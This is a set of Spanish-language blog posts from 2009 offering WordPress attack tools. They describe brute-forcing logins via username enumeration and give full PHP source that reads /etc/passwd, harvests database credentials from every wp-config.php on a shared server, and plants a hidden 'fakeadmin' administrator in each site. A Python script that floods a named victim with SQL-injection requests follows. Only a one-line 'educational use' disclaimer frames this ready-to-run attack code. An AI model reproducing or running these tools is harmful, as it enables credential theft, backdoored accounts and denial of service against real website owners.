De esta forma, cada vez que presiono Alt+Shift + T, aparece en twitter lo que estoy escuchando.

Ataque de fuerza bruta a WordPress

Zerial — Mon, 07 Dec 2009 12:29:07 +0000

Los ataques por fuerza bruta a instalaciones WordPress son un tanto faciles, ya que es muy sencillo determinar los usuarios del sistema y no tiene sistemas de protección de Throttling Login Attempts o límite de intentos de ingreso, lo cual nos permite hacer éste tipo de ataques.
Determinar los nombres de usuarios es tan sencillo como escribir algún supuesto usuario y llenar el campo de contraseña con cualquier información, cuando presionemos “Iniciar Sesion” el sistema nos dirá “Usuario incorrecto” si es que el usuario no existe o bien “Password incorrecta“, en el caso que el usuario si exista y el password sea invlálido. Con un ataque distribuido es posible obtener el password de un usuario en particular muy sencillamente, sólo es cosa de tiempo.
Si pensamos hacerlo de forma remota puede que nos tardemos un poco más, pero pensemos desde el mismo lado del servidor, imaginemosnos que tenemos una cuenta en el hosting donde está hospedado el CMS, será todo mucho más fácil y más rápido.

Hace un tiempo, yo publiqué un script en php bastante sencillo que nos permitía hacer ésto en simples pasos leyendo palabras desde un diccionario, lo interesante de éste script es que no sólo funciona con wordpress, sino con cualquier weblogin “simple” e inseguro. Luego encontré un artículo relacionado muy interesante, que hablaba sobre estos tipos de ataques y analizaban un script que encontraron en un servidor, el cual era mucho mas sofisticado y trabajado que el mio, permitia hacer ataques distribuidos desde distintas máquinas y de esta forma aumentar si desempeño más de un 1000% (sí, mil por ciento).

Su funcionamiento (copy&paste):

La funcion wp_brute_attempt() toma 3 parámetros, $ch que es la estuctura cURL (cURL es una herramienta de línea de comando que se puede usar para realizar peticiones HTTP ). Los otros dos parámetros definen el sitio y la contraseña que se intentará. Si el script consigue validarse exitosamente, la página que es devuelta por el servidor contendrá la frase “Log Out”, y la función devolverá el valor verdadero.

Ahora, lo interesante del script es que permite el cracking distribuido. La información es guardada en una base de datos MySQL y el script realmente se conecta en forma directa a la base de datos principal. Esto permite al atacante correr varios scripts simultáneos – cada uno de ellos tomará 200 URL nuevas y las marcará con el ID del script forzador ($colo)

Encuentro súper interesante lo que se hizo y de la forma en que fue pensado, la próxima véz que se me ocurra hacer algo así, lo hare distribuido usando una base de datos accesible remotamente para aumentar el rendimiento y desempeño del script. Si lo llego a hacer, publicaré una prueba de concepto con los resultados.

Fuente en español: Segu-Info

WP-Config Discover: Héchale un vistazo a todos los WordPress del servidor

Zerial — Mon, 10 Aug 2009 03:04:08 +0000

WP-Config Discover es el nombre que le puse a un script/exploit en el que estuve trabajando durante la semana. Este script no se aprovecha de ninguna falla ni vulnerabilidad de wordpress ni de algun servicio en especifico, sino de algo que es completamente normal: Lectura para el usuario www-data sobre el fichero wp-config.php.

Como todos saben, wordpress al igual que todos los cms, guardan la configuración de la base de datos (usuario, password, host, prefijo de las tablas, etc) en un fichero, el cual debe ser legible por el usuario que está corriendo el servicio http (generalmente apache/www-data).

Código

< ?php
$paths = array(
"blog",
"site",
"html",
"www",
"html/blog",
"www/blog",
"site/blog",
"wordpress",
"wp",
"www/wp",
"www/wordpress",
"html/wordpress",
"html/wp",
"public_html",
"public_html/blog",
"public_html/wp",
"public_html/wordpress",
);
$files = array(
"wp-config.php",
);
print "Checking for ….\n";
if(!is_readable("/etc/passwd")) die("err0r: can’t read /etc/passwd (safe mode?)");
$_f = @file("/etc/passwd");
foreach($_f as $usr){
$usr = explode(":", $usr);
$uid = $usr[2];
$home = $usr[5];
$usr = $usr[0];
if($uid >= 1000){
print $usr." (uid:".$uid."): ".$home."\n";
foreach($paths as $path){
if(file_exists($home."/".$path)) {
print "\tSearching in ".$home."/".$path."\n";
foreach($files as $file){
if(file_exists($home."/".$path."/".$file)){
print "\t\tFound: ".$file."\n";
$__f = @file($home."/".$path."/".$file);
foreach($__f as $line){
if(stristr($line, "DB_USER")) { preg_match_all(‘/define$\’(.*)$;/’, $line, $output); print "\t\t\t".str_replace("DB_USER’, ","usr=>", $output[1][0])."\n"; }
if(stristr($line, "DB_PASSWORD")) { preg_match_all(‘/define$\’(.*)$;/’, $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD’, ", "pwd=>", $output2[1][0])."\n"; }
if(stristr($line, "DB_NAME")) { preg_match_all(‘/define$\’(.*)$;/’, $line, $output3); print "\t\t\t".str_replace("DB_NAME’, ", "db=>", $output3[1][0])."\n"; }
if(stristr($line, "DB_HOST")) { preg_match_all(‘/define$\’(.*)$;/’, $line, $output4); print "\t\t\t".str_replace("DB_HOST’, ", "host=>", $output4[1][0])."\n"; }
if(stristr($line, "\$table_prefix")) { preg_match_all(‘/\$table_prefix(.*);/’, $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; }
flush();
}
print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
if($_GET[‘attack’] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
if($_GET[‘attack’] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
flush();
}
}
}
flush();
}
flush();
}
}
function getURL($user, $pass, $db, $host, $prefix){
preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
$sql = @mysql_connect($host, $user, $pass);
@mysql_select_db($db);
$_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name=’siteurl’", $sql);
@mysql_close($sql);
return @mysql_result($_q, 0, ‘option_value’);
}
function UserAdmin($action, $user, $pass, $db, $host, $prefix){
preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
$sql = @mysql_connect($host, $user, $pass);
@mysql_select_db($db);
if($action == "create"){
$wp_uid = rand(9990,99999);
@mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", ‘fakeadmin’, md5(‘dummie’), ‘wordpress’, ‘dummie@wordpress.cl’, ‘http://’, NOW(), ”, 0, ‘wordpressdummieadmin’)", $sql);
@mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", ‘wp_capabilities’, ‘a:1:{s:13:\"administrator\";b:1;}’ )", $sql);
}
if($action == "delete"){
mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login=’fakeadmin’)", $sql);
mysql_query("DELETE FROM ".$prefix."users WHERE user_login=’fakeadmin’", $sql);
}
@mysql_close($sql);
return "fakeadmin/dummie";
}
?>

Este script tiene dos funciones embedidas, las cuales se deben llamar pasando pasando las variables attack=create_user o attack=delete_user. La primera crea un usuario admin (falso) en todos los wordpress y con la segunda, se eliminan estos usuarios creados.

Conceptualmente es un script muy sencillo pero en un servidor sin protecciones podría ser mortal.

El código está disponible tambien en http://codes.zerial.org/php/wp-config_discover.phps

nota: queda de más decir que es para uso educativo y es una herramienta de auditoría

DDoS Attacker Script: Peticiones automatizadas para lograr DoS

Zerial — Sun, 02 Aug 2009 19:26:52 +0000

“DDoS Attacker Script” es un pequeño script que he escrito en python que nos sirve para lograr con éxito un ataque de denegación de servicio en un sitio web. Este script lo diseñe especialmente para ataques de sql injection.

El funcionamiento es muy sencillo, se conecta y hace una petición de la URI especificada:

#!/usr/bin/python
import socket, sys, os
print "][ Attacking " + sys.argv[1]  + " ... ]["
print "injecting " + sys.argv[2];
def attack():
	#pid = os.fork()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], 80))
	print ">> GET /" + sys.argv[2] + " HTTP/1.1"
	s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	s.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	s.close()
for i in range(1, 10):
	attack()

La línea número 6 está comentada, si prefieren la pueden descomentar para ver lo que sucede.
El uso del script es de la siguiente forma:
$ python DDoS.py www.pagina.com SQLi
En www.pagina.com obviamente pondremos nuestra víctima y en SQLi, la cadena que hará el milagro, por ejemplo “ver_productos.php?id=55′ or ’1′=’1“

Mis scripts

Zerial — Tue, 19 May 2009 04:13:37 +0000

Este es un resumen de los distintos scripts y utilidades que he publicado en mi blog, con una breve descripcion y link de descarga.

dirhack: Script escrito en bash que nos ayudará al momento de querer hacer auditorias en nuestro servidor web con multiples usuarios. El script buscara en los directorios especificados los ficheros con información sensible que esten legibles y/o modificables por otros usuarios. Se puede ejecutar desde el explorador web o desde algun tipo de terminal o consola.

password salt cracker: Tambien escrito en bash, este script será útil cuando queramos romper algun password encriptado con un salt. Sirve para cualquier tipo de encriptacion como md5, sha, shadow, etc. La forma en que trabaja es netamente fuerza bruta y se basa en un diccionario de palabras. Lee palabra por palabra y la encripta con el salt especificado, si las password coinciden entonces bingo!.

web login por fuerza bruta/brute force web login: Con esta utilidad podremos realizar pequeñas pruebas a nuestro sistema de autentificacion y tambien verificar la calidad de nuestras contraseñas. Consiste en realizar determinadas peticiones POST a paginas que validen el login de una sesion. Debido a que esta basada en un diccionario de palabras, podría tardar horas en dar algun resultado.

firewall-router: Este es otro script en bash que facilita la creacion de reglas sobre iptables. Nos puede servir para que nuestra maquina sea un router y tambien firewall. Permite el routeo de paquetes, redireccionamiento de puertos, bloqueo de puertos, etc. Es bastante util y facil de usar, ademas permite el uso de ficheros externos para definir redirecciones de puertos, direcciones ip para bloquear, etc.

twitsh/twitbash: Lo desarrolle pensando en facilitar el uso te twitter en fluxbox. Esta herramienta no nos servira para leer los twits de otra gente pero si para enviar nuestros updates.